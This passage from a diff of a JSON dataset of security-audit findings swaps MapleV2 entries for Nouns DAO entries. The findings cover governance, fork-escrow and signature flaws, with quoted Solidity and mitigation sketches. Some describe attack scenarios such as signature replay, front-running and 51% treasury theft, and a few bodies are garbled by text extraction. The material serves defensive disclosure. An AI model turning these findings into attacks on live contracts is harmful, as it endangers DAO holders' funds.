timeBuffer; if (extended) { >> auction.endTime = _auction.endTime = block.timestamp + timeBuffer; } I.e. the permissionless settleAuction() mechanics will be disabled. The current bidder's funds will be frozen for an arbitrary time. As the new setting needs to pass voting, the probability is very low. At the same time it is higher for any forked DAO than for the original one, so, while the issue is present in V1 and V2, it becomes more severe in V3 in the context of the forked DAO.
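A minimal mitigation sketch (illustrative only; the MAX_TIME_BUFFER name and its bound are assumptions, not part of the reviewed code) would be to cap the setter:

uint256 public constant MAX_TIME_BUFFER = 1 days; // assumed sane upper bound
function setTimeBuffer(uint256 _timeBuffer) external override onlyOwner {
    require(_timeBuffer <= MAX_TIME_BUFFER, 'timeBuffer too large'); // bounds the extension window
    timeBuffer = _timeBuffer;
    emit AuctionTimeBufferUpdated(_timeBuffer);
}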
The impact is high, being a long-term freeze of the bidder's native tokens.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "Additional verification in removeLoanImpairment", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "Currently, if removeLoanImpairment is called after the loan's original due date, there will be no issues because the loan's removeLoanImpairment function will revert. It would be good to add a comment about this logic or duplicate the check explicitly in the loan manager. If the loan implementation is upgraded in the future to have a non-reverting removeLoanImpairment function, then the loan manager as-is would account for the interest incorrectly.", + "title": "Veto renouncing in the original DAO or rage quit blocking in a forked DAO as a result of any future proposals will open up the way for 51% attacks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "It is possible to renounce veto power in the V1, V2 and V3 versions of the protocol or to upgrade a forked V1 to block or remove rage quit. While these operations are a part of the standard workflow, they are irreversible and open up the possibility of all variations of a 51% attack. As the simplest example, in the absence of veto functionality a majority can introduce and execute a proposal to move all DAO treasury funds to an address they control. Also, there is a related vector, incentivized bad faith voting. _burnVetoPower() exists in V1, V2 and V3: In NounsDAOLogicV1: /** * @notice Burns veto priviledges * @dev Vetoer function destroying veto power forever */ function _burnVetoPower() public { // Check caller is pendingAdmin and pendingAdmin != address(0) require(msg.sender == vetoer, 'NounsDAO::_burnVetoPower: vetoer only'); _setVetoer(address(0)); } In NounsDAOLogicV2: /** * @notice Burns veto priviledges * @dev Vetoer function destroying veto power forever */ function _burnVetoPower() public { // Check caller is vetoer require(msg.sender == vetoer, 'NounsDAO::_burnVetoPower: vetoer only'); // Update vetoer to 0x0 emit NewVetoer(vetoer, address(0)); vetoer = address(0); // Clear the pending value emit NewPendingVetoer(pendingVetoer, address(0)); pendingVetoer = address(0); } In NounsDAOLogicV3: /** * @notice Burns veto priviledges * @dev Vetoer function destroying veto power forever */ function _burnVetoPower(NounsDAOStorageV3.StorageV3 storage ds) public { // Check caller is vetoer require(msg.sender == ds.vetoer, 'NounsDAO::_burnVetoPower: vetoer only'); // Update vetoer to 0x0 emit NewVetoer(ds.vetoer, address(0)); ds.vetoer = address(0); // Clear the pending value emit NewPendingVetoer(ds.pendingVetoer, address(0)); ds.pendingVetoer = address(0); } Also, veto() was removed from NounsDAOLogicV1Fork, and the only mitigation to the same attack is rage quit(): NounsDAOLogicV1Fork.sol#L195-L222 /** * @notice A function that allows token holders to quit the DAO, taking their pro rata funds, * and sending their tokens to the DAO treasury. * Will revert as long as not all tokens were claimed, and as long as the delayed governance has not expired.
* @param tokenIds The token ids to quit with */ function quit(uint256[] calldata tokenIds) external nonReentrant { checkGovernanceActive(); uint256 totalSupply = adjustedTotalSupply(); for (uint256 i = 0; i < tokenIds.length; i++) { nouns.transferFrom(msg.sender, address(timelock), tokenIds[i]); } for (uint256 i = 0; i < erc20TokensToIncludeInQuit.length; i++) { IERC20 erc20token = IERC20(erc20TokensToIncludeInQuit[i]); uint256 tokensToSend = (erc20token.balanceOf(address(timelock)) * tokenIds.length) / totalSupply; bool erc20Sent = timelock.sendERC20(msg.sender, address(erc20token), tokensToSend); if (!erc20Sent) revert QuitERC20TransferFailed(); } uint256 ethToSend = (address(timelock).balance * tokenIds.length) / totalSupply; bool ethSent = timelock.sendETH(msg.sender, ethToSend); if (!ethSent) revert QuitETHTransferFailed(); emit Quit(msg.sender, tokenIds); } This means that any malfunction of a token in erc20TokensToIncludeInQuit in this function, as an example if USDC is added while a minority of forked nouns holders was previously black-listed by the USDC contract, will open up the possibility of a majority attack on them, i.e. there will be no way to stop any majority-backed malicious proposal from affecting the DAO-held funds of such holders. Nouns holders that aren't aware enough of the importance of a functioning veto() for the original DAO and quit() for the forked DAO can pass a proposal that renounces veto or [fully or partially] blocks quit(), enabling the 51% attack. Such a change will be irreversible, and if a majority forms and acts before any similar mitigation functionality can be reinstated, the whole DAO funds of the rest of the holders can be lost. Per very low likelihood (which increases with the switch from veto() to quit() as a safeguard) and high funds loss impact, setting the severity to be low.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "Can check msg.sender != collateralAsset/fundsAsset for extra safety", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "Some old ERC tokens (e.g. the Sandbox's SAND token) allow arbitrary calls from the token address itself. This odd behavior is usually a result of implementing the ERC677 approveAndCall and transferAndCall functions incorrectly. With these tokens, it is technically possible for the low-level msg.sender.call(...) in the liquidator to be executing arbitrary code on one of the tokens, which could let an attacker drain the funds.", + "title": "The try-catch block at NounsAuctionHouseFork will only catch errors that contain strings", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "This issue has been previously identified and documented in the Nouns Builder Code4rena Audit. The catch Error(string memory) within the try/catch block in the _createAuction function only catches reverts that include strings. At present, in the current version of the NounsAuctionHouseFork there are no reverts without a string. But, given the fact that the NounsAuctionHouseFork and the NounsTokenFork contracts are meant to be upgradable, if a future upgrade in NounsTokenFork:mint() replaces the require statements with custom errors, the existing catch statement won't be able to handle the reverts, potentially leading to a faulty state of the contract.
Here's an example illustrating that the catch Error(string memory) won't catch reverts with custom errors that don't contain strings: contract Test1 { bool public error; Test2 test; constructor() { test = new Test2(); } function testCustomErr() public { try test.revertWithRevert() {} catch Error(string memory) { error = true; } } function testRequire() public { try test.revertWithRequire() {} catch Error(string memory) { error = true; } } } contract Test2 { error Revert(); function revertWithRevert() public { revert Revert(); } function revertWithRequire() public { require(true == false, \"a\"); } }", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "IERC426 Implementation of preview and max functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "For the preview functions, EIP 4626 states: MAY revert due to other conditions that would also cause the deposit [mint/redeem, etc.] to revert. But the comments in the interface currently state: MUST NOT revert. In addition to the comments, there is the actual behavior of the preview functions. A commonly accepted interpreta- tion of the standard is that these preview functions should revert in the case of conditions such as protocolPaused, !active, !openToPublic totalAssets > liquidityCap etc. The argument basically states that the max functions should return 0 under such conditions and the preview functions should revert whenever the amount exceeds the max.", + "title": "Private keys are read from the .env environment variable in the deployment scripts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "It has been identified that the private keys of privileged accounts (PROPOSER_KEY and DEPLOYER_PRIVATE_KEY) are read from environment variables within the deployment scripts. The deployer address is verified on Etherscan as Nouns DAO: Deployer. Additionally, since the proposal is made by the account that owns the PROPOSER_KEY, it can be assumed that the proposer owns at least some Nouns. ProposeENSReverseLookupConfigMain- ProposeDAOV3UpgradeMainnet.s.sol#L24. Given the privileged status of the deployer and the proposer, unauthorized access to these private keys could have a negative impact on the reputation of the Nouns DAO. The present method of managing private keys, i.e., through environment variables, represents a potential security risk. This is due to the fact that any program or script with access to the process environment can read these variables. As mentioned in the Foundry documentation: This loads in the private key from our .env file. Note: you must be careful when exposing private keys in a .env file and loading them into programs. This is only recommended for use with non-privileged deployers or for local / test setups. For production setups please review the various wallet options that Foundry supports.", "labels": [ - "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Spearbit", + "Nouns", + "Severity: Low Risk DeployDAOV3NewContractsBase.s.sol#L53, DeployDAOV3DataContractsBase.s.sol#L21," ] }, { - "title": "Set domainEnd correctly in intermediate _advanceGlobalPaymentAccounting steps", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "pay- ments[paymentWithEarliestDueDate].paymentDueDate, which is possibly zero if the last payment has just been accrued past.
This is currently not an issue, because in this scenario domainEnd would never be used before it is set back to its correct value in _updateIssuanceParams. However, for increased readability, it is recommended to prevent this odd intermediate state from ever occurring. domainEnd function, set to is", + "title": "Objection period will be disabled after the update to V3 is completed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Nouns DAO V3 introduces a new functionality called the objection-only period. This is a conditional voting period that gets activated upon a last-minute proposal swing from defeated to successful, affording 'against' voters more reaction time. Only against votes will be possible during the objection period. After the proposals created in ProposeDAOV3UpgradeMainnet.s.sol and ProposeTimelockMigrationCleanupMainnet.s.sol are executed, lastMinuteWindowInBlocks and objectionPeriodDurationInBlocks will still remain set to 0. A new proposal will have to be created, passed and executed in the DAO that calls the _setLastMinuteWindowInBlocks() and _setObjectionPeriodDurationInBlocks() functions to enable this functionality.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "Replace hard-coded value with PRECISION constant", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The constant PRECISION is equal to 1e30. The hard-coded value 1e30 is used in the _queueNext- Payment function, which can be replaced by PRECISION.", + "title": "Potential risks from outdated OpenZeppelin dependencies in the Nouns DAO v3", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The OpenZeppelin libraries are being used throughout the Nouns DAO v3 codebase. These libraries, however, are locked at version 4.4.0, which is an outdated version that has some known vulnerabilities. Specifically: The SignatureChecker.isValidSignatureNow is not expected to revert. However, an incorrect assumption about Solidity 0.8's abi.decode allows some cases to revert, given a target contract that doesn't implement EIP-1271 as expected. The contracts that may be affected are those that use SignatureChecker to check the validity of a signature and handle invalid signatures in a way other than reverting. The ERC165Checker.supportsInterface is designed to always successfully return a boolean, and under no circumstance revert. However, an incorrect assumption about Solidity 0.8's abi.decode allows some cases to revert, given a target contract that doesn't implement EIP-165 as expected, specifically if it returns a value other than 0 or 1. The contracts that may be affected are those that use ERC165Checker to check for support for an interface and then handle the lack of support in a way other than reverting. At present, these vulnerabilities do not appear to have an impact on the Nouns DAO codebase, as the corresponding functions revert upon failure. Nevertheless, these vulnerabilities could potentially impact future versions of the codebase.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "Use of floating pragma version", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "Contracts should be deployed using a fixed pragma version.
Locking the pragma helps to ensure that contracts do not accidentally get deployed using, for example, an outdated compiler version that might introduce bugs that affect the contract system negatively.", + "title": "DAO withdraws forked ids from escrow without emphasizing total supply increase which contradicts the spec and can catch holders unaware", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Withdrawal of original nouns with the ids of the forked tokens from escrow after a successful fork is a material event for all original nouns holders, as the adjusted total supply is increased as long as the withdrawal recipient is not the treasury. There were special considerations regarding Nouns withdrawal impact after the fork: For this reason we're considering a change to make sure transfers go through a new function that helps Nouners understand the implication, e.g. by setting the function name to withdrawNounsAndGrowTotalSupply or something similar, as well as emitting events that indicate the new (and greater) total supply used by the DAO. However, currently withdrawDAONounsFromEscrow() neither has a special name, nor mentions the increase of the adjusted total supply when to != ds.timelock: NounsDAOV3Fork.sol#L160-L178 /** * @notice Withdraws nouns from the fork escrow after the fork has been executed * @dev Only the DAO can call this function * @param tokenIds the tokenIds to withdraw * @param to the address to send the nouns to */ function withdrawDAONounsFromEscrow( NounsDAOStorageV3.StorageV3 storage ds, uint256[] calldata tokenIds, address to ) external { if (msg.sender != ds.admin) { revert AdminOnly(); } ds.forkEscrow.withdrawTokens(tokenIds, to); emit DAOWithdrawNounsFromEscrow(tokenIds, to); } A Nouns holder might not understand the consequences of withdrawing the nouns from escrow and support such a proposal, while as of now it is approximately a USD 65k loss per noun withdrawn, cumulatively, for current holders. The vulnerability scenario here is a holder supporting the proposal without understanding the consequences for supply, as no emphasis is made, and then suffering their share of the loss as a result of its execution. Per low likelihood and impact, setting the severity to be low.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "PoolManager has low-level shares computation logic", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The PoolManager has low-level shares computation logic that should ideally only be in the ERC4626 Pool to separate the concerns.", + "title": "USDC-paying proposals executing between ProposeDAOV3UpgradeMainnet and ProposeTimelockMigrationCleanupMainnet will fail", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "As explained in one of the Known Issues, ProposeDAOV3UpgradeMainnet contains a proposal that transfers the ownership of PAYER_MAINNET and TOKEN_BUYER_MAINNET from timelockV1 to timelockV2. There could be older USDC-paying proposals executing after ProposeDAOV3UpgradeMainnet which assume timelockV1 ownership of these contracts.
Older USDC-paying proposals executing after ProposeDAOV3UpgradeMainnet will fail.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "Add additional checks to prevent refinancing/funding a closed loan", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "It's important that an already liquidated loan is not reused by refinancing or funding again as it would break a second liquidation when the second liquidator contract is deployed with the same arguments and salt.", + "title": "Zero value ERC-20 transfers can be performed on sending treasury funds to a quitting member or forked DAO, denying the whole operation if one of the erc20TokensToIncludeInQuit tokens doesn't allow this", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Some tokens do not allow zero value transfers. Such behaviour does not violate the ERC-20 standard, is not prohibited in any way, and can occur in any non-malicious token. As a somewhat well-known example, Aave's LEND requires the amount to be positive: etherscan.io/address/0x80fb784b7ed66730e8b1dbd9820afd29931aab03#code#L74 function transfer(address _to, uint256 _value) returns(bool) { require(balances[msg.sender] >= _value); require(balances[_to] + _value > balances[_to]); As stETH, which is currently used by the Nouns treasury, is upgradable, it cannot be ruled out that it might require the same in the future for any reason. etherscan.io/token/0xae7ab96520de3a18e5e111b5eaab095312d7fe84#code A zero value itself can occur in a situation when a valid token was added to erc20TokensToIncludeInFork, but the timelock's balance of this token is currently empty. NounsDAOLogicV1Fork's quit() and NounsDAOV3Fork's executeFork() and joinFork() will be unavailable in such a scenario, i.e. the DAO forking workflow will be disabled. Since the update of erc20TokensToIncludeInFork goes through proposal mechanics and major tokens rarely upgrade, while there is an additional requirement of an empty balance, the cumulative probability of the scenario can be deemed quite low; the impact of blocking core functionality, however, is high, so setting the severity to be low.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "PoolManager.removeLoanManager errors with out-of-bounds if loan manager not found", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The PoolManager.removeLoanManager errors with an out-of-bounds error if the loan manager is not found.", + "title": "A signer of multiple proposals will cause all of them except one to fail creation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Like proposers, signers are also allowed to back only one proposal at a time. As commented: \"This is a spam protection mechanism to limit the number of proposals each noun can back.\" However, unlike proposers, who know which of their proposals are active and when, signers may not readily have that insight and can sign multiple proposals they may want to back. If more than one such proposal is proposed, then only the first one will pass the checkNoActiveProp() check for this signer and all the others will fail this check and thereby the proposal creation itself. A signer of multiple proposals will cause all of them except one to fail creation.
The other proposals will then have to exclude such signatures and be resubmitted. This could be accidental or used by malicious signers for griefing proposal creations.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "PoolManager.removeLoanManager does not clear loanManagers mapping", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The PoolManager.removeLoanManager does not clear the reverse loanManagers[mapleLoan] = loanManager mapping.", + "title": "Single-step ownership change is risky", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The codebase primarily follows a two-step ownership change pattern. However, in specific sections, a single-step ownership change is utilized. A two-step ownership change is preferable, where: The current owner proposes a new address for the ownership change. In a separate transaction, the proposed new address can then claim the ownership.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "Pool._requestRedeem reduces the wrong approval amount", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The requestRedeem function transfers escrowShares_ from owner but reduces the approval by shares_. Note that in the current code these values are the same but for future PoolManager upgrades this could change.", + "title": "No storage gaps for upgradeable contracts might lead to storage slot collision", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "When implementing upgradable contracts that inherit from other contracts, it is important that there are storage gaps, in case new storage variables are later added to the inherited contracts. If a storage gap variable isn't added, when the upgradable contract introduces new variables, it may override the variables in the inheriting contract. As noted in the OpenZeppelin Documentation: You may notice that every contract includes a state variable named __gap. This is empty reserved space in storage that is put in place in Upgrade Safe contracts. It allows us to freely add new state variables in the future without compromising the storage compatibility with existing deployments. It isn't safe to simply add a state variable because it \"shifts down\" all of the state variables below in the inheritance chain.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "Issuance rate for double-late claims does not need to be updated", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The previousRate_ for the 8c) case in claim is always zero because the payment (!onTimePayment_). The subtraction can be removed is late I'd suggest removing the subtraction here as it's confusing. The first payment's IR was reduced in _advanceGlob- alPaymentAccounting, the newly scheduled one that is also past due date never increased the IR.", + "title": "The version string is missing from the domain separator allowing submission of signatures in different protocol versions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The version string seems to be missing from the domain separator.
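For illustration, a hedged sketch of a domain separator that does include the version field (the domain name and version values here are assumptions, not the project's actual parameters):

bytes32 domainSeparator = keccak256(abi.encode(
    keccak256('EIP712Domain(string name,string version,uint256 chainId,address verifyingContract)'),
    keccak256(bytes('Nouns DAO')), // assumed domain name
    keccak256(bytes('1')),         // version string; bumping it on upgrade invalidates old signatures
    block.chainid,
    address(this)
));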
According to EIP-712: Protocol designers only need to include the fields that make sense for their signing domain. Unused fields are left out of the struct type. While it's not a mandatory field as per the EIP-712 standard, it would be sensible for the protocol to include the version string in the domain separator, considering that the contracts are upgradable. For instance, if a user generates a signature for version v1.0, they may not want the signature to remain valid following an upgrade.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "Additional verification that paymentIdOf[loan_] is not 0", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "Most functions in the loan manager use the value paymentIdOf[loan_] without first checking if it's the default value of 0. Anyone can pay off a loan at any time to cause the claim function to set paymentIdOf[loan_] to 0, so even the privileged functions could be front-run to call on a loan with paymentIdOf 0. This is not an issue in the current codebase because each function would revert for some other reasons, but it is recommended to add an explicit check so future upgrades on other modules don't make this into a more serious issue.", + "title": "Two/three forks in a row will force expiration of execution-awaiting proposals", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Proposal execution on the original DAO is disallowed during the forking period. While the proposed fork period is currently 7 days, MAX_FORK_PERIOD is 14 days. GRACE_PERIOD, which is the time allowed for a queued proposal to execute, has been increased from the existing 14 days to 21 days specifically to account for the fork period. However, if there are three consecutive forks whose active fork periods add up to 21 days, or two forks in the worst case if the fork period is set to MAX_FORK_PERIOD, then all queued proposals will expire and cannot be executed. Malicious griefing forkers can collude to time and break up their voting power to fork consecutively to prevent execution of queued proposals on the original DAO, thus forcing them to expire.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "LoanManager redundant check on late payment", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "block.timestamp <= nextPaymentDueDate_ in one of the if statements. The payment is already known to be late at this point in the code, so block.timestamp > previousPaymentDueDate_ is always true.", + "title": "Withdrawing from fork escrow can be front-run to prevent withdrawal and force join the fork", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "withdrawFromForkEscrow() is meant to allow a fork escrowed holder to change their mind about joining the fork by withdrawing their escrowed tokens. However, the current design allows another fork joining holder to front-run a withdrawFromForkEscrow() transaction with their escrowToFork() to exceed the fork threshold and also call executeFork() with it (if the threshold was already met then this doesn't even have to be another fork joining holder).
This will cause withdrawFromForkEscrow() to fail, because the fork period is now active, and that holder is forced to join the fork with their previously escrowed tokens. Scenario: Alice and Bob decide to create/join a fork with their 10 & 15 tokens respectively to meet the 20% fork threshold (assume 100 Nouns). Alice escrows first but then changes her mind and calls withdrawFromForkEscrow(). Bob observes this transaction (assume no private mempool) and front-runs it with his escrowToFork() + executeFork(). This forces Alice to join the fork instead of staying back. withdrawFromForkEscrow() does not always succeed and is likely effective only in the early stages of the escrow period, but not towards the end when the fork threshold is almost met. Late fork escrowers do not have as much of an opportunity as others to change their mind about joining the fork.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "Add encodeArguments/decodeArguments to WithdrawalManagerInitializer", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "Unlike the other Initializers, the WithdrawalManagerInitializer.sol does not have public en- codeArguments/decodeArguments functions, and PoolDeployer need to be changed to use these functions cor- rectly", + "title": "A malicious proposer can replay signatures to create duplicate proposals", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Suppose Bob and Alice sign a proposal for Carl, authorizing a transfer of exactly 100,000 USDC to a specified address (xyz), and their signatures were created with a long expiration time. Following the normal procedure, Carl creates the proposal, the vote is held, and the proposal enters the 'succeeded' state. However, since Bob and Alice's signatures are still valid due to the long expiration time, Carl could reuse these signatures to create another proposal for an additional transfer of 100,000 USDC to the same xyz address, as long as Bob and Alice still retain their voting power/nouns. Thus, Carl could double the intended transfer amount without their explicit authorization. While it is true that Bob and Alice can intervene by either cancelling the new proposal or invalidating their signatures before the creation of the second proposal, it necessitates them to take action, which may not always be feasible or timely.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "Reorder WM.processExit parameters", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "All other WM and Pool function signatures start with (uint256 shares/assets, address owner) parameters but the WM.processExit has its parameters reversed (address, uint256).", + "title": "Potential re-minting of previously burnt NounsTokenFork", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "In the current implementation of the NounsTokenFork contract, there is a potential vulnerability that allows a previously burned NounsTokenFork token to be re-minted. This risk occurs due to the user retaining the status of escrow.ownerOfEscrowedToken(forkId, nounId) even after the claimFromEscrow() function call.
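A minimal sketch of the hardening direction (hypothetical and heavily simplified; in the real contracts this logic is split between NounsTokenFork and the fork escrow, and names may differ):

contract EscrowSketch {
    // forkId => nounId => original owner
    mapping(uint32 => mapping(uint256 => address)) public escrowedTokensByForkId;

    function claim(uint32 forkId, uint256 nounId) external {
        require(escrowedTokensByForkId[forkId][nounId] == msg.sender, 'not escrowed owner');
        delete escrowedTokensByForkId[forkId][nounId]; // clear the status so the same id can never be claimed (re-minted) twice
        // ... mint nounId to msg.sender ...
    }
}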
Presently, no tokens are burned outside of the NounsAuctionHouseFork, and tokens are only burned in the case that no bids are placed for a nounId. However, this issue could become exploitable under the following circumstances: 1. If a new burn() functionality is added elsewhere in the code. 2. If a new contract is granted the Minter role. 3. If the NounsAuctionHouseFork is updated to a malicious implementation. Additionally, exploiting this potential issue would lead to the remainingTokensToClaim variable decreasing, causing it to underflow (<0). In this situation, some legitimate users would be unable to claim their tokens due to this underflow.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "Additional verification in MapleLoanInitializer", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The MapleLoanInitializer could verify additional arguments to avoid bad pool deployments.", + "title": "A single invalid/expired/cancelled signature will prevent the creation and updation of proposals", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "For proposals created via proposeBySigs() or updated via updateProposalBySigs(), if the proposer includes even a single invalid/expired/cancelled signature (without performing offchain checks to prevent this scenario), verifyProposalSignature() will revert and the creation/updation of proposals will fail. NounsDAOV3Proposals.sol#L815 A proposer accidentally including one or more invalid/expired/cancelled signatures submitted by a signer will cause the proposal creation/updation to fail, lose the gas used, and will have to resubmit after checking and excluding such signatures. This also allows griefing by signers who intentionally submit an invalid/expired signature, or a valid one which is later cancelled (using cancelSig()) just before the proposal is created/updated. Note that while the signers currently have cancellation powers, which gives them a greater griefing opportunity even at later proposal states, that has been reported separately in a different issue.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk NounsDAOV3Proposals.sol#L956-L962" ] }, { - "title": "Clean up updatePlatformServiceFee", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The updatePlatformServiceFee can be cleaned up to use an existing helper function", + "title": "Missing require checks in NounsDAOV3Proposals.execute() and executeOnTimelockV1() functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The following require checks are missing: Function NounsDAOV3Proposals.execute(): require(proposal.executeOnTimelockV1 == false, 'NounsDAO::execute: executeOnTimelockV1 = true'); Function NounsDAOV3Proposals.executeOnTimelockV1(): require(proposal.executeOnTimelockV1 == true, 'NounsDAO::executeOnTimelockV1: executeOnTimelockV1 = false'); Due to the absence of these require checks, the NounsDAOLogicV3 contract leaves open a vulnerability where, if two identical proposals with the exact same transactions are concurrently queued in both the timelockV1 and timelock contracts, the proposal originally intended for execution on timelock can be executed on timelockV1 and vice versa.
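As an illustrative placement sketch (simplified; the real function signature and its surrounding checks differ):

function execute(NounsDAOStorageV3.StorageV3 storage ds, uint256 proposalId) external {
    NounsDAOStorageV3.Proposal storage proposal = ds._proposals[proposalId];
    // The missing guard: reject proposals that were queued for timelockV1.
    require(!proposal.executeOnTimelockV1, 'NounsDAO::execute: executeOnTimelockV1 = true');
    // ... state checks and timelock.executeTransaction(...) ...
}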
The consequence of this scenario is that it essentially blocks, or causes a denial of service to, the legitimate execution path of the corresponding proposal for either timelockV1 or timelock. This occurs because each proposal has been inadvertently executed on the unintended timelock contract due to the lack of a condition check that would otherwise ensure the correct execution path.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "Document restrictions on Refinancer", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The refinancer may not set unexpected storage slots, like changing the _fundsAsset because _- drawableFunds, _refinanceInterest are still measured in the old fund's asset.", + "title": "Due to misaligned DAO and Executors logic any proposal will be blocked from execution at the 'eta + GRACE_PERIOD' timestamp", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "There is an inconsistency in the treatment of the eta + GRACE_PERIOD moment of time in the proposal lifecycle: any proposal is executable in the timelock at this timestamp, but has the expired status in the DAO logic. Both Executors do allow executions when block.timestamp == eta + GRACE_PERIOD: The NounsDAOExecutor:executeTransaction() function: function executeTransaction( address target, uint256 value, string memory signature, bytes memory data, uint256 eta ) public returns (bytes memory) { ... require( getBlockTimestamp() >= eta, \"NounsDAOExecutor::executeTransaction: Transaction hasn't surpassed time lock.\" ); require( getBlockTimestamp() <= eta + GRACE_PERIOD, 'NounsDAOExecutor::executeTransaction: Transaction is stale.' ); The NounsDAOExecutorV2:executeTransaction() function: function executeTransaction( address target, uint256 value, string memory signature, bytes memory data, uint256 eta ) public returns (bytes memory) { ... require( getBlockTimestamp() >= eta, \"NounsDAOExecutor::executeTransaction: Transaction hasn't surpassed time lock.\" ); require( getBlockTimestamp() <= eta + GRACE_PERIOD, 'NounsDAOExecutor::executeTransaction: Transaction is stale.' ); While all (V1, V2, V3, and V1Fork) DAO state functions produce the expired state. The NounsDAOLogicV2:state() function: function state(uint256 proposalId) public view returns (ProposalState) { require(proposalCount >= proposalId, 'NounsDAO::state: invalid proposal id'); Proposal storage proposal = _proposals[proposalId]; if (proposal.vetoed) { return ProposalState.Vetoed; } else if 